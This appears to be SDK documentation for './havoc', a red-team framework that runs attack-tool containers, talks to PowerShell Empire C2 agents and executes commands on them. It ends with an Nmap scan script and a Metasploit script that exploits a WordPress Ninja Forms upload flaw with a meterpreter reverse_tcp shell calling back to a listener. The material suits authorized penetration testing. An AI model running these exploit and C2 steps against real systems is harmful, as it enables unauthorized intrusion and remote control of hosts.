Usage Through SDK
Executing and interacting with ./havoc container tasks can be accomplished through the /task-control API endpoint, but the ./havoc Python SDK provides pre-built methods that achieve the same end result.
A connection to the Campaign API must be created before you can launch or interact with container tasks. To connect to the Campaign API:
Start python:
python3
Import the havoc package and create the connection:
import havoc
api_domain_name = '<api_domain_name>'
api_region = '<api_region>'
api_key = '<api_key>'
secret = '<secret>'
h = havoc.Connect(api_region, api_domain_name, api_key, secret)
Launching Container Tasks
Container tasks can be launched as ECS tasks in your AWS account by using the run_task
or task_startup
methods of the havoc Python package. This approach will launch the container task using the ECS Cluster and Task Definitions that are provisioned as part of the ./havoc Campaign deployment. The run_task
method launches the task and immediately returns the ./havoc API response indicating whether or not the request to launch the task was successful. The task_startup
method launches the task and then waits for the task to report that it is ready.
response = h.run_task(task_name, task_type, task_host_name, task_domain_name, portgroups, end_time)
task_name - (Required) a uniquely recognizable identifier to associate with the task.
task_type - (Required) specify the type of container task to be executed. See the Task Types section of the Administration Through SDK page for details on listing the available task types.
task_host_name - specify a host name for the task. The task_domain_name value must also be set for the task_host_name value to be used. If task_host_name is set, a resource record will be created in the hosted zone that corresponds with the domain name provided as the task_domain_name. If not provided, it defaults to 'None'.
task_domain_name - specify a domain name for the task. The domain name must be tracked as a domain resource by the Campaign API. See the Domains section of the Administration page for more details. The task_host_name value must also be set for the task_domain_name value to be used. If not provided, it defaults to 'None'.
portgroups - include portgroups to be assigned to the task. The portgroups must be provided in the form of a list and each portgroup specified must be a valid, existing portgroup. If not set, it defaults to ['None'].
end_time - (Optional) specify a future time to automatically terminate the task. The value must be a date/time string that matches the format '%m/%d/%Y %H:%M:%S %z'. If not set, it defaults to 'None'.
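For example, a minimal sketch of launching a task with all parameters supplied (the task name, host name, domain name, portgroup, and end time below are hypothetical placeholders; substitute values from your own campaign, and note that the domain must already be tracked by the Campaign API as described above):
# Launch an nmap task with a host name, domain name, portgroup, and automatic end time.
# All values below are placeholders.
task_name = 'nmap-scanner-1'
task_type = 'nmap'
task_host_name = 'scanner1'
task_domain_name = 'example.com'
portgroups = ['scanner-portgroup']
end_time = '12/31/2030 23:59:59 +0000'
response = h.run_task(task_name, task_type, task_host_name, task_domain_name, portgroups, end_time)
print(response)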
response = h.task_startup(task_name, task_type, task_host_name, task_domain_name, portgroups, end_time)
task_name - (Required) a uniquely recognizable identifier to associate with the task.
task_type - (Required) specify the type of container task to be executed. See the Task Types section of the Administration Through SDK page for details on listing the available task types.
task_host_name - specify a host name for the task. The task_domain_name value must also be set for the task_host_name value to be used. If task_host_name is set, a resource record will be created in the hosted zone that corresponds with the domain name provided as the task_domain_name. If not provided, it defaults to 'None'.
task_domain_name - specify a domain name for the task. The domain name must be tracked as a domain resource by the Campaign API. See the Domains section of the Administration page for more details. The task_host_name value must also be set for the task_domain_name value to be used. If not provided, it defaults to 'None'.
portgroups - include portgroups to be assigned to the task. The portgroups must be provided in the form of a list and each portgroup specified must be a valid, existing portgroup. If not set, it defaults to ['None'].
end_time - (Optional) specify a future time to automatically terminate the task. The value must be a date/time string that matches the format '%m/%d/%Y %H:%M:%S %z'. If not set, it defaults to 'None'.
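As a minimal sketch, task_startup can be called with just a task name and type, assuming the optional parameters can be left at the defaults described above (the task name is a placeholder):
# task_startup blocks until the container task reports that it is ready.
task_name = 'nmap-scanner-1'
task_type = 'nmap'
response = h.task_startup(task_name, task_type)
print(response)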
Launching Remote Container Tasks
One of the nice benefits of containerized attack tools is that the containers can run on any platform that supports Docker containers. In the ./havoc context, the term "remote container task" describes any container task that is not running in the ECS Cluster that is provisioned by the ./havoc Campaign deployment. Remote container tasks cannot be launched directly from the Campaign API but ./havoc container tasks are designed such that they can be run on any system that can run Docker containers. With the proper environment variables applied, container tasks will check in and register themselves with the Campaign so that they may be controlled via the Campaign API. To run a ./havoc container task directly in Docker, use the following command:
sudo docker run -d \
--name=<container-name> \
--network host \
--cap-add SYS_ADMIN \
-e "LOCAL_IP=$(hostname -I)" \
-e "CAMPAIGN_ID=<campaign-id>" \
-e "USER_ID=<campaign-user-id>" \
-e "TASK_NAME=<task-name>" \
-e "TASK_CONTEXT=<task-context>" \
-e "REMOTE_TASK=true" \
-e "API_KEY=<api-key>" \
-e "SECRET=<secret>" \
-e "API_DOMAIN_NAME=<api-domain-name>" \
-e "API_REGION=<api-region>" \
public.ecr.aws/havoc_sh/<task-type>:latest \
/usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
--name - (Optional) provide a name that Docker will assign to the container.
-e "LOCAL_IP=$(hostname -I)" - (Required) if the container is being run on a Linux host, this option can be entered exactly as shown. Alternatively, the $(hostname -I) string can be replaced with a space-separated list of IP addresses assigned to the host where the container is running.
-e "CAMPAIGN_ID=<campaign-id>" - (Required) this should be the value of your campaign's campaign_id that was provided as output from the terraform apply command.
-e "USER_ID=<campaign-user-id>" - (Required) this should be the user ID associated with the owner of the API key and secret that will be used to connect the container task to the Campaign API.
-e "TASK_NAME=<task-name>" - (Required) a unique name to associate with the task.
-e "TASK_CONTEXT=<task-context>" - (Required) the task_context should contain details about where the container task is running, such as the site/location, the machine name, or both.
-e "REMOTE_TASK=true" - (Required) this parameter must be set to true for a remote container task.
-e "API_KEY=<api-key>" - (Required) replace <api-key> with the actual API key value that will be used to connect the remote container task to the Campaign API.
-e "SECRET=<secret>" - (Required) replace <secret> with the actual secret value that will be used to connect the remote container task to the Campaign API.
-e "API_DOMAIN_NAME=<api-domain-name>" - (Required) this should be the value of your campaign's api_domain_name that was provided as output from the terraform apply command.
-e "API_REGION=<api-region>" - (Required) this should be the value of your campaign's api_region that was provided as output from the terraform apply command.
public.ecr.aws/havoc_sh/<task-type>:latest - (Required) this should be the ./havoc public container registry's path for the container task type that you want to run. See the Container Tasks section for the ./havoc container registry details for each container task.
/usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf - (Required) this is the command that runs the specific applications that are required for the container task to function. It should be entered exactly as shown.
Verifying a Container Task
When creating automated playbooks, it can be helpful to verify that a required container task is present. The verify_task
method will accept task_name
and task_type
inputs and query the running container tasks to verify that the task is present and that it is of the specified task type. If the task is verified, the task's details are returned. Otherwise, the method returns False.
response = h.verify_task(task_name, task_type)
task_name - (required) the name of the task to verify.
task_type - (required) the type of task that the given task name should be.
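A short sketch of using verify_task in a playbook, branching on the False return when the task is missing (the task name and type are placeholders):
# Check that a previously launched nmap task is still present before using it.
task_details = h.verify_task('nmap-scanner-1', 'nmap')
if not task_details:
    print('Task not found or wrong task type - launch it before continuing.')
else:
    print('Task verified:')
    print(task_details)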
Interacting with Container Tasks
The interact_with_task
method is used to send instructions (a.k.a. instruct_command
) to a container task and then retrieve the results of the instruction. This method combines the operations of the instruct_task
and get_task_results
methods listed below. As such, there's no need to run the instruct_task
and get_task_results
methods individually if you're using the interact_with_task
method.
response = h.interact_with_task(task_name, instruct_instance, instruct_command, instruct_args)
task_name - (required) the name of the task you want to instruct.
instruct_instance - (optional) a unique string to associate with the instruction (defaults to a random string).
instruct_command - (required) the command to send to the task.
instruct_args - (optional) a dictionary of arguments to pass with the command. Some commands have required arguments. See the Container Tasks section for details about available container task commands and their arguments.

The value specified in the instruct_instance parameter is used by the container task to run the instruct_command in a Python class instance. This has the benefit of being able to send multiple commands to a container task and have them executed within the same class instance. For example, when working with a Metasploit container task, the process of staging an exploit requires sending several commands to configure the exploit. In this scenario, you could stage and configure an exploit using multiple commands with a shared instruct_instance and then stage and configure the same exploit targeting a different host using a different shared instruct_instance. This way, you can execute an exploit against multiple targets while keeping the executions and their resulting outputs separated from one another. This has an added side benefit of making it easy to group operations together. By using the same instruct_instance value for commands executed across different container tasks, the resulting output from the tasks can be searched or filtered by their common instruct_instance value.

One drawback to this approach is that executing the same instruct_command multiple times while using the same instruct_instance will cause the interact_with_task method to return only the results for the first execution of the command, which may cause unintended results during custom playbook executions. As such, care should be taken to ensure that executing the same command multiple times is done using different instruct_instance values for each command execution.
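A brief sketch of sending two related instructions to the same task with a shared instruct_instance so they execute in the same class instance (the task name, commands, and arguments are illustrative placeholders; see the Container Tasks section for the real commands supported by each task type):
import random
import string

# Use one random instruct_instance for both instructions so they share state on the task.
instruct_instance = ''.join(random.choice(string.ascii_letters) for i in range(6))

# First instruction (placeholder command and arguments).
response = h.interact_with_task('my-task', instruct_instance, 'first_command', {'arg1': 'value1'})
print(response)

# Second instruction, executed in the same class instance because the instruct_instance matches.
response = h.interact_with_task('my-task', instruct_instance, 'second_command', {'arg2': 'value2'})
print(response)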
The instruct_task
method is used to send a command (a.k.a. instruct_command
) to a container task. See the Container Tasks section for information about commands available for each of the supported container tasks.
response = h.instruct_task(task_name, instruct_instance, instruct_command, instruct_args)
task_name - (Required) the unique name associated with the container task that you want to instruct.
instruct_instance - (Optional) a value that can be associated with the instruction. If the parameter is excluded, a default value of 'havoc' is used.
instruct_command - (Required) the command to send to the container task.
instruct_args - (Optional) a Python dictionary containing any arguments that need to be passed along with the command. Some commands have required arguments. See the Container Tasks section for details about available container task commands and their arguments.
The value specified in the instruct_instance parameter is used by the container task to run the instruct_command in a Python class instance. This has the benefit of being able to send multiple commands to a container task and have them executed within the same class instance. For example, when working with a Metasploit container task, the process of staging an exploit requires sending several commands to configure the exploit. In this scenario, you could stage and configure an exploit using multiple commands with a shared instruct_instance and then stage and configure the same exploit targeting a different host using a different shared instruct_instance. This way, you can execute an exploit against multiple targets while keeping the executions and their resulting outputs separated from one another. This has an added side benefit of making it easy to group operations together. By using the same instruct_instance value for commands executed across different container tasks, the resulting output from the tasks can be searched or filtered by their common instruct_instance value.
If using the instruct_task method, a separate call must be made to gather the instruct_task results. Container tasks write their output to a queue that can be queried by task_name. The get_task_results and get_filtered_task_results methods can be used to query the queue. Results are returned in a list within the response dictionary. The key for the list is called 'queue' and can be accessed using response['queue'].
response = h.get_task_results(task_name)
task_name - (Required) the unique name associated with the container task that you want to get results for.
response = h.get_filtered_task_results(task_name, instruct_command, instruct_instance)
task_name - (required) the name of the task to retrieve results from.
instruct_instance - (optional) the instruct_instance to retrieve results for.
instruct_command - (optional) the command to retrieve results for.
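A short sketch of pairing instruct_task with get_filtered_task_results to poll for a command's output (the task name, instruct_instance, and command are placeholders, and the sketch assumes the response contains an empty 'queue' list until results arrive; the Nmap example at the bottom of this page shows the same pattern with get_task_results):
import time as t

instruct_instance = 'example-instance'
instruct_command = 'example_command'
h.instruct_task('my-task', instruct_instance, instruct_command)

# Poll the results queue until output for this command and instruct_instance arrives.
results = None
while not results:
    t.sleep(5)
    response = h.get_filtered_task_results('my-task', instruct_command, instruct_instance)
    if response['queue']:
        results = response['queue']
print(results)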
Waiting for an Idle Task
When a container task is processing an instruction, its task status is set to 'busy' and when the container task finishes processing the instruction and returns the instruction's results, the container task's status is reset to 'idle.' If you attempt to send an instruction to a busy task, you will receive a '409' error from the ./havoc API. Therefore, it's necessary to wait for a task to become idle again prior to sending another instruction. The wait_for_idle_task
method will periodically query a task and check its status. When 'idle' is returned as the status, the wait_for_idle_task
method will return the task's details.
response = h.wait_for_idle_task(task_name)
task_name - (required) the name of the task that should be queried until it becomes idle.
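For instance, a minimal sketch of waiting for a task to become idle before sending a follow-up instruction (the task name, instruct_instance, and command are placeholders):
# Block until the task reports an 'idle' status, then send the next instruction.
task_details = h.wait_for_idle_task('my-task')
print(task_details)
h.instruct_task('my-task', 'example-instance', 'example_command')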
Waiting for a C2 Agent or Session Connection
Container tasks that provide command and control capabilities have an agent_status_monitor
or session_status_monitor
event type that is triggered whenever a new agent or session connection is established with the task. It can be useful to continually poll the results queue until a new C2 connection is established. The wait_for_c2
method can be used for this purpose. When called, the wait_for_c2
method will generate a list of existing agents associated with the specified container task and then wait for a new agent_status_monitor
or session_status_monitor
event from the specified task to arrive in the queue. When the event arrives, the wait_for_c2
method returns the container task and agent/session details.
response = h.wait_for_c2(task_name)
task_name - (required) the name of the task that the C2 agent or session will connect to.
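A minimal sketch of blocking until a new agent or session connects to a C2 task (the task name is a placeholder; the structure of the returned details depends on the C2 container task type):
# Block until a new agent or session checks in with the C2 task, then inspect the details.
c2_details = h.wait_for_c2('my-c2-task')
print(c2_details)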
Verifying a PowerShell Empire C2 Agent Exists
Before attempting to interact with an agent, it may be necessary to verify that an agent with the expected name is connected to the PowerShell Empire Container Task. The verify_agent
method exists for this purpose.
response = h.verify_agent(task_name, agent_name)
task_name - (required) the name of the PowerShell Empire task that the C2 agent is associated with.
agent_name - (required) the name of the C2 agent to verify.
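A short sketch of checking for an expected agent before interacting with it, assuming verify_agent follows the verify_task pattern and returns a falsy value when the agent is not present (the task and agent names are placeholders):
# Verify that the expected agent is connected before sending it any commands.
agent_details = h.verify_agent('my-powershell-empire-task', 'EXPECTED_AGENT')
if not agent_details:
    print('Agent not found on the task.')
else:
    print('Agent verified:')
    print(agent_details)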
Executing a Shell Command on a PowerShell Empire Agent
Executing shell commands on a PowerShell Empire agent can be achieved through the instruct_task
and interact_with_task
methods but both of those methods require using the get_task_results
or get_filtered_task_results
method to gather the shell command's output. The execute_agent_shell_command
method will deliver a shell command request to the agent, poll the agent results until the output of the shell command is available, and then return the shell command output.
response = h.execute_agent_shell_command(task_name, agent_name, command, wait_for_results, completion_string)
task_name - (required) the name of the PowerShell Empire task that the C2 agent is associated with.
agent_name - (required) the name of the C2 agent to execute the shell command on.
command - (required) the shell command to execute on the C2 agent.
wait_for_results - (optional) indicate whether the method should wait for the shell command results (True|False). Defaults to True.
completion_string - (optional) a string that should be present in the results to indicate the command execution is done. If not specified, results are returned as soon as any results data becomes available, which may lead to incomplete results being returned.
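A minimal sketch of running a shell command on an agent and waiting for complete output, using a completion string echoed by the command itself (the task name, agent name, and command are illustrative placeholders):
# Run the command and wait until the results contain the completion string.
command = 'whoami; echo COMMAND_COMPLETE'
response = h.execute_agent_shell_command(
    'my-powershell-empire-task',
    'EXPECTED_AGENT',
    command,
    True,
    'COMMAND_COMPLETE'
)
print(response)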
Executing a Module on a PowerShell Empire Agent
Executing a module on a PowerShell Empire agent can be achieved through the instruct_task
and interact_with_task
methods but both of those methods require using the get_task_results
or get_filtered_task_results
method to gather the module's output. The execute_agent_module
method will deliver a module execution request to the agent, poll the agent results until the output of the module is available, and then return the module output.
response = h.execute_agent_module(task_name, agent_name, module, module_args, wait_for_results, completion_string)
task_name - (required) the name of the PowerShell Empire task that the C2 agent is associated with.
agent_name - (required) the name of the C2 agent to execute the module on.
module - (required) the name, including the full path, of the module to execute on the C2 agent.
module_args - (optional) a dictionary containing arguments to be passed to the module.
wait_for_results - (optional) indicate whether the method should wait for the module results (True|False). Defaults to True.
completion_string - (optional) a string that should be present in the results to indicate the module execution is done. If not specified, results are returned as soon as any results data becomes available, which may lead to incomplete results being returned.

The list of available modules and their configuration parameters can be retrieved from a PowerShell Empire Container Task by passing the get_modules instruct_command to the PowerShell Empire Container Task via the interact_with_task method. See the Available Commands section of the PowerShell Empire Container Task page for more details.
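A brief sketch of executing a module on an agent and waiting for its output (the task name, agent name, and module path are illustrative; confirm the exact module path and its parameters with the get_modules instruct_command described above):
# Run a situational awareness module on the agent and wait for the results.
module = 'powershell/situational_awareness/host/winenum'
module_args = {}
response = h.execute_agent_module(
    'my-powershell-empire-task',
    'EXPECTED_AGENT',
    module,
    module_args
)
print(response)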
Getting Execution Results from a PowerShell Empire Agent
When executing a shell command or module on a PowerShell Empire C2 agent, the execute_agent_shell_command
and execute_agent_module
methods will automatically retrieve the output from the executed command or module. But if you need to pull shell command or module execution results independently from the execution request, you can use the get_agent_results
method for that purpose. Technically, the interact_with_task
and instruct_task
methods can be used for that purpose as well but the results returned by the agent are compressed and encoded for efficiency purposes and the get_agent_results
method automatically decodes and decompresses the results.
response = h.get_agent_results(task_name, agent_name, task_id)
task_name - (required) the name of the PowerShell Empire task that the C2 agent is associated with.
agent_name - (required) the name of the C2 agent to get execution results from.
task_id - (optional) the ID associated with the specific shell command or module execution task that you would like to get results for. Defaults to None, meaning that all execution results available for the agent are returned.
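A minimal sketch of pulling results for a specific execution independently of the execution request, assuming the task_id value comes from the original shell command or module execution response (all values shown are placeholders):
# Retrieve the decoded, decompressed results for a specific agent execution.
results = h.get_agent_results('my-powershell-empire-task', 'EXPECTED_AGENT', '42')
print(results)

# Omit task_id to retrieve all available execution results for the agent.
all_results = h.get_agent_results('my-powershell-empire-task', 'EXPECTED_AGENT')
print(all_results)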
Terminating Container Tasks
There are several options for terminating container tasks but the recommended approach is to use the task_shutdown
method or send the terminate
command through the instruct_task
method. This approach instructs the container task to shut itself down, which allows the container task to generate confirmation output indicating that the container task is terminating. When the container task's "terminating" message is received by the Campaign API, it will do the required clean up regarding the status of the task. The task_shutdown
method provides the added benefit of waiting for the task's "terminating" message to return, thereby confirming that the task was shut down cleanly.
response = h.task_shutdown(task_name)
task_name - (required) the name of the task to shut down.
This example shows how to terminate a task using the instruct_task
method:
task_name = 'my-task'
instruct_instance = 'foo'
instruct_command = 'terminate'
response = h.instruct_task(task_name, instruct_instance, instruct_command)
If a container task is unresponsive, you can force kill it using the kill_task
method. With this approach, the "terminating" output message will not be sent by the container task so the queue will not have confirmation from the container task that it was terminated. However, the Campaign API will still perform the required clean up regarding the status of the task including performing a forced shutdown of the ECS task.
response = h.kill_task(task_name)
task_name - (required) the name of the task to kill.
Remote container tasks can be terminated with either the task_shutdown or instruct_task method above; however, the kill_task method will not actually shut down the container since the Campaign API does not have direct control over your remote Docker host. If a remote container task is unresponsive for some reason, you'll need to run the sudo docker stop <container-id> and sudo docker rm <container-id> commands to actually shut down and delete the container. In this scenario you would still use the kill_task method to clean up the remote container task references in the Campaign API.
Examples
Nmap scan example
The example below performs the following operations:
- Launch an Nmap container task and verify that it is running
- Run an Nmap scan
- Get the scan results
- Terminate the Nmap container task
# Import the supporting Python packages.
import os
import string
import random
import pprint
import time as t
from datetime import datetime
# Import the havoc Python package.
import havoc
# Configure pretty print for displaying output.
pp = pprint.PrettyPrinter(indent=4)
# Setup the ./havoc Campaign API connection.
# Note that you should not hard code your API key and secret in a script.
# Use os.environ to pull the API key and secret values from environment variables.
api_region = "<my-api-region>"
api_domain_name = "<my-api-domain>"
api_key = os.environ['API_KEY']
secret = os.environ['SECRET']
h = havoc.Connect(api_region, api_domain_name, api_key, secret)
# Create a date string to use in the task name.
d = datetime.utcnow()
sdate = d.strftime('%m-%d-%Y')
# Launch an Nmap container task.
nmap_task_name = f'nmap_{sdate}'
nmap_task_type = 'nmap'
print(f'Launching {nmap_task_type} task type with name {nmap_task_name}')
h.run_task(nmap_task_name, nmap_task_type)
# Use list_tasks to show the running tasks.
tasks = h.list_tasks()
print('\nList of running tasks:')
pp.pprint(tasks)
# Use get_task to check the task's status (the task is ready when its status is "idle").
# A 'while' loop can be used to continually pull the task's details until the task is idle.
task_status = None
task_details = None
while task_status != 'idle':
    t.sleep(5)
    task_details = h.get_task(nmap_task_name)
    task_status = task_details['task_status']
print(f'\n{nmap_task_name} is ready:')
pp.pprint(task_details)
# Run an Nmap scan (set the instruct_command to 'run_scan').
nmap_instruct_command = 'run_scan'
# Use a random string for the instruct_instance.
nmap_instruct_instance = ''.join(random.choice(string.ascii_letters) for i in range(6))
# Set a target for the Nmap scan.
nmap_target = '172.28.128.0/24'
# Setup the instruct_args for the Nmap scan.
nmap_instruct_args = {'options': '-sV -T4 -Pn -p 8585 --open', 'target': nmap_target}
# Execute the scan.
print('\nRunning Nmap scan')
h.instruct_task(nmap_task_name, nmap_instruct_instance, nmap_instruct_command, nmap_instruct_args)
# Get the Nmap scan results.
# Pull the task results continually until output from the run_scan command is retrieved.
nmap_finished = None
while not nmap_finished:
    t.sleep(5)
    nmap_results = h.get_task_results(nmap_task_name)
    for entry in nmap_results['queue']:
        if entry['instruct_command'] == nmap_instruct_command and entry['instruct_instance'] == nmap_instruct_instance:
            nmap_finished = True
            print(f'\n{nmap_task_name} {nmap_instruct_command} results:')
            pp.pprint(entry)
# Terminate the task.
nmap_instruct_command = 'terminate'
print(f'Terminating task {nmap_task_name}')
h.instruct_task(nmap_task_name, nmap_instruct_instance, nmap_instruct_command)
Metasploit exploit example
The example below performs the following operations:
- Launch a Metasploit container task and verify that it is running
- Stage, configure and execute an exploit
- Get the exploit results
- Terminate the Metasploit container task
# Import the supporting Python packages.
import os
import string
import random
import pprint
import time as t
from datetime import datetime
# Import the havoc Python package.
import havoc
# Configure pretty print for displaying output.
pp = pprint.PrettyPrinter(indent=4)
# Setup the ./havoc Campaign API connection.
# Note that you should not hard code your API key and secret in a script.
# Use os.environ to pull the API key and secret values from environment variables.
api_region = "<my-api-region>"
api_domain_name = "<my-api-domain>"
api_key = os.environ['API_KEY']
secret = os.environ['SECRET']
h = havoc.Connect(api_region, api_domain_name, api_key, secret)
# Create a date string to use in the task name.
d = datetime.utcnow()
sdate = d.strftime('%m-%d-%Y')
# Launch a Metasploit container task.
metasploit_task_name = f'metasploit_{sdate}'
metasploit_task_type = 'metasploit'
print(f'Launching {metasploit_task_type} task type with name {metasploit_task_name}')
h.run_task(metasploit_task_name, metasploit_task_type)
# Use list_tasks to show the running tasks.
tasks = h.list_tasks()
print('\nList of running tasks:')
pp.pprint(tasks)
# Use get_task to check the task's status (the task is ready when its status is "idle").
# A 'while' loop can be used to continually pull the task's details until the task is idle.
task_status = None
task_details = None
while task_status != 'idle':
    t.sleep(5)
    task_details = h.get_task(metasploit_task_name)
    task_status = task_details['task_status']
print(f'\n{metasploit_task_name} is ready:')
pp.pprint(task_details)
# Stage a Metasploit exploit (set the instruct_command to 'set_exploit_module').
metasploit_instruct_command = 'set_exploit_module'
# Use a random string for the instruct_instance.
metasploit_instruct_instance = ''.join(random.choice(string.ascii_letters) for i in range(6))
# Setup the instruct_args to indicate which exploit to use.
# In this example, we're using the wp_ninja_forms_unauthenticated_file_upload exploit.
metasploit_instruct_args = {'exploit_module': 'multi/http/wp_ninja_forms_unauthenticated_file_upload'}
# Stage the exploit.
print('\nSetting exploit module')
h.instruct_task(metasploit_task_name, metasploit_instruct_instance, metasploit_instruct_command, metasploit_instruct_args)
# Setup the instruct_command and instruct_args to configure the exploit options.
target_ip = '172.28.128.95'
target_port = 8585
target_uri = '/wordpress/'
form_path = '/index.php/king-of-hearts/'
metasploit_instruct_command = 'set_exploit_options'
metasploit_instruct_args = {'RHOSTS': target_ip, 'RPORT': target_port, 'TARGETURI': target_uri, 'FORM_PATH': form_path}
# Configure the exploit options.
print('\nConfiguring exploit options')
h.instruct_task(metasploit_task_name, metasploit_instruct_instance, metasploit_instruct_command, metasploit_instruct_args)
# Setup the instruct_command and instruct_args to indicate the exploit target.
metasploit_instruct_command = 'set_exploit_target'
metasploit_instruct_args = {'exploit_target': 0}
# Configure the exploit target.
print('\nConfiguring exploit target')
h.instruct_task(metasploit_task_name, metasploit_instruct_instance, metasploit_instruct_command, metasploit_instruct_args)
# Setup the instruct_command and instruct_args to set the payload module.
metasploit_instruct_command = 'set_payload_module'
metasploit_instruct_args = {'payload_module': 'php/meterpreter/reverse_tcp'}
# Set the payload module.
print('\nSetting the payload module')
h.instruct_task(metasploit_task_name, metasploit_instruct_instance, metasploit_instruct_command, metasploit_instruct_args)
# Setup the instruct_command and instruct_args to configure the payload options.
metasploit_instruct_command = 'set_payload_options'
metasploit_instruct_args = {'LHOST': '172.28.128.5', 'LPORT': 80}
# Configure the payload options.
print('\nConfiguring the payload options')
h.instruct_task(metasploit_task_name, metasploit_instruct_instance, metasploit_instruct_command, metasploit_instruct_args)
# Setup the instruct_command and instruct_args to execute the exploit.
metasploit_instruct_command = 'execute_exploit'
metasploit_instruct_args = None
# Execute the exploit.
print('\nExecuting the exploit')
h.instruct_task(metasploit_task_name, metasploit_instruct_instance, metasploit_instruct_command, metasploit_instruct_args)
# Get the Metasploit exploit results.
# Pull the task results continually until output from the execute_exploit command is retrieved.
metasploit_finished = None
while not metasploit_finished:
    t.sleep(5)
    metasploit_results = h.get_task_results(metasploit_task_name)
    for entry in metasploit_results['queue']:
        if entry['instruct_command'] == metasploit_instruct_command and entry['instruct_instance'] == metasploit_instruct_instance:
            metasploit_finished = True
            print(f'\n{metasploit_task_name} {metasploit_instruct_command} results:')
            pp.pprint(entry)
# Terminate the task.
metasploit_instruct_command = 'terminate'
print(f'Terminating task {metasploit_task_name}')
h.instruct_task(metasploit_task_name, metasploit_instruct_instance, metasploit_instruct_command)